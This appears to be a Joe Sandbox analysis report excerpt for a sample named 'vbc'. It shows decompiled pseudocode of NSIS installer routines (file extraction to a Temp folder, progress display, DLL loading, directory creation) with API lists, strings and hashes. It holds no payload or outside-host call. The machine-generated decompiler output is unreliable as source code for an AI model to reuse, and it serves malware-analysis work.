Instruction ID: 1f061f0c38a4f693c331b34270bc70c7c89456ffd71d5a2abe04866b7cb55e0c
Opcode Fuzzy Hash: 228fa0226a90281b4f2baa84689300d30e54d034f1a820beff8a1dc93a475882
Instruction Fuzzy Hash: 9551D071901204ABDB10AF65DD82B9E7FA8EB44756F10853BE501FA2C1CB7C8F418B5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040176F Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405E60( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405DE9(E0040651A(_t81, 0x7b4000)), ??);
				} else {
					E0040651A();
				}
				E004067A1(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E00406850(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00405FE5(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E0040600A(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E0040557C(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x7a8ae8;
						goto L32;
					} else {
						E0040651A("C:\Users\Albus\AppData\Local\Temp\nsf2EB0.tmp", _t83);
						E0040651A(_t83, _t81);
						E00406557(_t77, _t81, _t83, "C:\Users\Albus\AppData\Local\Temp\nsf2EB0.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
						E0040651A(_t83, "C:\Users\Albus\AppData\Local\Temp\nsf2EB0.tmp");
						_t64 = E00405B7A("C:\Users\Albus\AppData\Local\Temp\nsf2EB0.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x7a8ae8 =  &( *0x7a8ae8->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E0040557C();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E0040557C(0xffffffea,  *(_t86 - 8)); // executed
				 *0x7a8b14 =  *0x7a8b14 + 1;
				_push(_t77);
				_push(_t77);
				_push( *(_t86 - 0x38));
				_push( *((intOrPtr*)(_t86 - 0x28)));
				_t45 = E004032B4(); // executed
				 *0x7a8b14 =  *0x7a8b14 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E00406557(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E00406557(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405B7A();
					goto L29;
				}
				goto L33;
			}

0x0040176f
0x00401776
0x00401782
0x00401785
0x0040178a
0x0040178d
0x00401794
0x004017b0
0x00401796
0x00401797
0x00401797
0x004017b6
0x004017bb
0x004017bb
0x004017bf
0x004017c2
0x004017c7
0x004017c9
0x004017cb
0x004017d0
0x004017d0
0x004017db
0x004017db
0x004017ec
0x004017ee
0x004017ee
0x004017ef
0x004017ef
0x004017f2
0x004017f5
0x004017f8
0x004017f8
0x004017ff
0x0040180e
0x00401813
0x00401816
0x00401819
0x00000000
0x00000000
0x0040181b
0x0040181e
0x00401874
0x00401879
0x004015b6
0x0040292e
0x0040292e
0x00402c2a
0x00402c2d
0x00402c2d
0x00000000
0x00401820
0x00401826
0x0040182d
0x0040183a
0x00401845
0x0040185b
0x0040185b
0x0040185e
0x00000000
0x00401864
0x00401864
0x00401865
0x00401882
0x00402c33
0x00402c33
0x00402c33
0x00401867
0x00401867
0x00401868
0x00401493
0x0040239d
0x0040239d
0x0040239d
0x00401865
0x0040185e
0x00402c35
0x00402c39
0x00402c39
0x00401892
0x00401897
0x0040189d
0x0040189e
0x0040189f
0x004018a2
0x004018a5
0x004018aa
0x004018b0
0x004018b4
0x004018b6
0x004018be
0x004018ca
0x004018b8
0x004018b8
0x004018bc
0x00000000
0x00000000
0x004018bc
0x004018d3
0x004018d9
0x004018db
0x00000000
0x004018e1
0x004018e1
0x004018e4
0x004018fc
0x004018e6
0x004018e9
0x004018f2
0x004018f2
0x00401901
0x00401906
0x00402398
0x00000000
0x00402398
0x00000000

APIs

lstrcatW.KERNEL32 ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,007B4000,?,?,00000031), ref: 004017D5

Part of subcall function 0040651A: lstrcpynW.KERNEL32(?,?,00000400,0040367A,007A7A60,NSIS Error), ref: 00406527

Part of subcall function 0040557C: lstrlenW.KERNEL32(007A0F28,00000000,0079BD28,7555110C,?,?,?,?,?,?,?,?,?,004033F5,00000000,?), ref: 004055B4
Part of subcall function 0040557C: lstrlenW.KERNEL32(004033F5,007A0F28,00000000,0079BD28,7555110C,?,?,?,?,?,?,?,?,?,004033F5,00000000), ref: 004055C4
Part of subcall function 0040557C: lstrcatW.KERNEL32 ref: 004055D7
Part of subcall function 0040557C: SetWindowTextW.USER32 ref: 004055E9
Part of subcall function 0040557C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040560F
Part of subcall function 0040557C: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405629
Part of subcall function 0040557C: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405637

Strings

Call, xrefs: 0040178D, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp\System.dll, xrefs: 00401835, 00401851
C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp, xrefs: 00401821, 0040183F

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp$C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp\System.dll$Call
API String ID: 1941528284-3429065576
Opcode ID: 12778993b973a10c22c4ece172c34c72592007db8cc4149c3b2bec960c285f91
Instruction ID: 5ac910c5439316a1e26e23cc6d9244c071f0fb36d70bd55283583498c2888f83
Opcode Fuzzy Hash: 12778993b973a10c22c4ece172c34c72592007db8cc4149c3b2bec960c285f91
Instruction Fuzzy Hash: 9841A271900108BACF11BBB5DD85DAE3A79EF4536CB20423FF412B50E1DA3C8A519A6E

Uniqueness

Uniqueness Score: -1.00%

Function 004032B4 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				short _v152;
				void* _t65;
				void* _t69;
				long _t70;
				intOrPtr _t74;
				long _t75;
				intOrPtr _t76;
				void* _t77;
				int _t87;
				intOrPtr _t91;
				intOrPtr _t94;
				long _t95;
				signed int _t96;
				int _t97;
				int _t98;
				intOrPtr _t99;
				void* _t100;
				void* _t101;

				_t96 = _a16;
				_t91 = _a12;
				_v12 = _t96;
				if(_t91 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t91;
				if(_t91 == 0) {
					_v16 = 0x797700;
				}
				_t62 = _a4;
				if(_a4 >= 0) {
					E004034C2( *0x7a8ab8 + _t62);
				}
				if(E004034AC( &_a16, 4) == 0) {
					L41:
					_push(0xfffffffd);
					goto L42;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t91 != 0) {
							if(_a16 < _t96) {
								_t96 = _a16;
							}
							if(E004034AC(_t91, _t96) != 0) {
								_v8 = _t96;
								L44:
								return _v8;
							} else {
								goto L41;
							}
						}
						if(_a16 <= _t91) {
							goto L44;
						}
						_t87 = _v12;
						while(1) {
							_t97 = _a16;
							if(_a16 >= _t87) {
								_t97 = _t87;
							}
							if(E004034AC(0x793700, _t97) == 0) {
								goto L41;
							}
							_t69 = E004060BC(_a8, 0x793700, _t97); // executed
							if(_t69 == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t97;
							_a16 = _a16 - _t97;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40ce58 =  *0x40ce58 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40ce40 = 0xb;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t98 = 0x4000;
						if(_a16 < 0x4000) {
							_t98 = _a16;
						}
						if(E004034AC(0x793700, _t98) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t98;
						 *0x40ce30 = 0x793700;
						 *0x40ce34 = _t98;
						while(1) {
							_t94 = _v16;
							 *0x40ce38 = _t94;
							 *0x40ce3c = _v12;
							_t74 = E00406A42(0x40ce30);
							_v24 = _t74;
							if(_t74 < 0) {
								break;
							}
							_t99 =  *0x40ce38; // 0x79bd28
							_t100 = _t99 - _t94;
							_t75 = GetTickCount();
							_t95 = _t75;
							if(( *0x7a8b14 & 0x00000001) != 0 && (_t75 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t101 = _t101 + 0xc;
								E0040557C(0,  &_v152); // executed
								_v20 = _t95;
							}
							if(_t100 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t76 =  *0x40ce38; // 0x79bd28
									_v8 = _v8 + _t100;
									_v12 = _v12 - _t100;
									_v16 = _t76;
									L23:
									if(_v24 != 4) {
										continue;
									}
									goto L44;
								}
								_t77 = E004060BC(_a8, _v16, _t100); // executed
								if(_t77 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t100;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}

0x004032bf
0x004032c3
0x004032c6
0x004032cb
0x004032cd
0x004032cd
0x004032d4
0x004032d8
0x004032dd
0x004032df
0x004032df
0x004032e6
0x004032eb
0x004032f6
0x004032f6
0x00403308
0x0040349a
0x0040349a
0x00000000
0x0040330e
0x00403312
0x00403447
0x0040348a
0x0040348c
0x0040348c
0x00403498
0x0040349f
0x004034a2
0x00000000
0x00000000
0x00000000
0x00000000
0x00403498
0x0040344c
0x00000000
0x00000000
0x0040344e
0x00403451
0x00403454
0x00403457
0x00403459
0x00403459
0x00403469
0x00000000
0x00000000
0x00403470
0x00403477
0x00403441
0x00403441
0x0040349c
0x0040349c
0x00000000
0x0040349c
0x00403479
0x0040347c
0x00403483
0x00000000
0x00000000
0x00000000
0x00403485
0x00000000
0x00403451
0x0040331e
0x00403320
0x00403327
0x00403327
0x0040332e
0x00403334
0x0040333b
0x0040333e
0x00000000
0x00000000
0x00000000
0x00000000
0x00403344
0x00403344
0x00403344
0x0040334c
0x0040334e
0x0040334e
0x0040335f
0x00000000
0x00000000
0x00403365
0x00403368
0x0040336e
0x00403374
0x00403374
0x0040337f
0x00403385
0x0040338a
0x00403391
0x00403394
0x00000000
0x00000000
0x0040339a
0x004033a0
0x004033a2
0x004033ab
0x004033ad
0x004033de
0x004033e4
0x004033f0
0x004033f5
0x004033f5
0x004033fa
0x00403435
0x00000000
0x00000000
0x00000000
0x004033fc
0x00403400
0x00403417
0x0040341c
0x0040341f
0x00403422
0x00403425
0x00403429
0x00000000
0x00000000
0x00000000
0x0040342f
0x00403409
0x00403410
0x00000000
0x00000000
0x00403412
0x00000000
0x00403412
0x004033fa
0x0040343d
0x00000000
0x0040343d
0x00000000
0x00403344

APIs

GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 0040331E
GetTickCount.KERNEL32(0040CE30,00793700,00004000), ref: 004033A2
MulDiv.KERNEL32 ref: 004033CB
wsprintfW.USER32 ref: 004033DE

Strings

... %d%%, xrefs: 004033D8
Z8@, xrefs: 004032B4

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%$Z8@
API String ID: 551687249-843941321
Opcode ID: 25d0c7491c7920abd27f2f6fef4c2f9f733347eed01cbf64b6988d1fc6eca9be
Instruction ID: 2eef5f2140e491494c2db8857c7661a7403dfcbdcc622e4f150acafc5917097d
Opcode Fuzzy Hash: 25d0c7491c7920abd27f2f6fef4c2f9f733347eed01cbf64b6988d1fc6eca9be
Instruction Fuzzy Hash: 59516C71800219EBDB11DF55DA84B9E7FB8AF40326F14417BE814BA2C1D7789F408BAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040557C Relevance: 10.6, APIs: 7, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040557C(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x7a7a44;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x7a8b14;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E00406557(_t38, 0, 0x7a0f28, 0x7a0f28, _a4);
					}
					_t27 = lstrlenW(0x7a0f28);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x7a7a28, 0x7a0f28); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x7a0f28;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x7a0f28[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x7a0f28, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

0x00405582
0x0040558c
0x00405591
0x00405597
0x004055a2
0x004055a5
0x004055a8
0x004055ae
0x004055ae
0x004055b4
0x004055bc
0x004055bf
0x004055dc
0x004055e0
0x004055e9
0x004055e9
0x004055f3
0x004055fc
0x00405608
0x0040560f
0x00405613
0x00405616
0x00405629
0x00405637
0x00405637
0x0040563b
0x0040563d
0x00405640
0x00000000
0x00405640
0x004055c1
0x004055c9
0x004055d1
0x004055d7
0x00000000
0x004055d7
0x004055d1
0x004055bf
0x0040564c

APIs

lstrlenW.KERNEL32(007A0F28,00000000,0079BD28,7555110C,?,?,?,?,?,?,?,?,?,004033F5,00000000,?), ref: 004055B4
lstrlenW.KERNEL32(004033F5,007A0F28,00000000,0079BD28,7555110C,?,?,?,?,?,?,?,?,?,004033F5,00000000), ref: 004055C4
lstrcatW.KERNEL32 ref: 004055D7
SetWindowTextW.USER32 ref: 004055E9
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040560F
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405629
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405637

Part of subcall function 00406557: lstrcatW.KERNEL32 ref: 004066FC
Part of subcall function 00406557: lstrlenW.KERNEL32(Call,00000000,007A0F28,?,004055B3,007A0F28,00000000), ref: 00406756

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: MessageSendlstrlen$lstrcat$TextWindow
String ID:
API String ID: 1495540970-0
Opcode ID: 4220885725f682886bacb0d0991f91d3f85cd1758724983fd30707fe453943de
Instruction ID: aa9a416d1108715588902b7fd38edda494bf3b6dcc64e7638c7e5b3a5377cb21
Opcode Fuzzy Hash: 4220885725f682886bacb0d0991f91d3f85cd1758724983fd30707fe453943de
Instruction Fuzzy Hash: F7218071900518BACF119F69ED449CFBF79EF49750F10803AF944B62A0C7794A40CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00406877 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406877(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}

0x0040688e
0x00406897
0x00406899
0x00406899
0x0040689d
0x004068b0
0x004068aa
0x004068aa
0x004068aa
0x004068c9
0x004068dd
0x004068e4

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040688E
wsprintfW.USER32 ref: 004068C9
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004068DD

Strings

UXTHEME, xrefs: 00406880
%s%S.dll, xrefs: 004068C3
\, xrefs: 0040689F

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction ID: cdb972a85fe13f574061c7118b8c5d4b466341d866a79bb5796beb4354b5a6e3
Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction Fuzzy Hash: E9F0F671511119A7DF10BB64DD0DF9B376CAF00305F11447AAA46F10E0EB7CDA68CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405A4B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405A4B(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405a56
0x00405a5a
0x00405a5d
0x00405a63
0x00405a67
0x00405a6b
0x00405a73
0x00405a7a
0x00405a80
0x00405a87
0x00405a8e
0x00405a96
0x00405a98
0x00000000
0x00405a98
0x00405aa2
0x00405aa9
0x00405abf
0x00000000
0x00000000
0x00000000
0x00405ac1
0x00405ac5

APIs

CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A8E
GetLastError.KERNEL32 ref: 00405AA2
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405AB7
GetLastError.KERNEL32 ref: 00405AC1

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A71

Memory Dump Source

Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_vbc.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3449924974-4017390910
Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
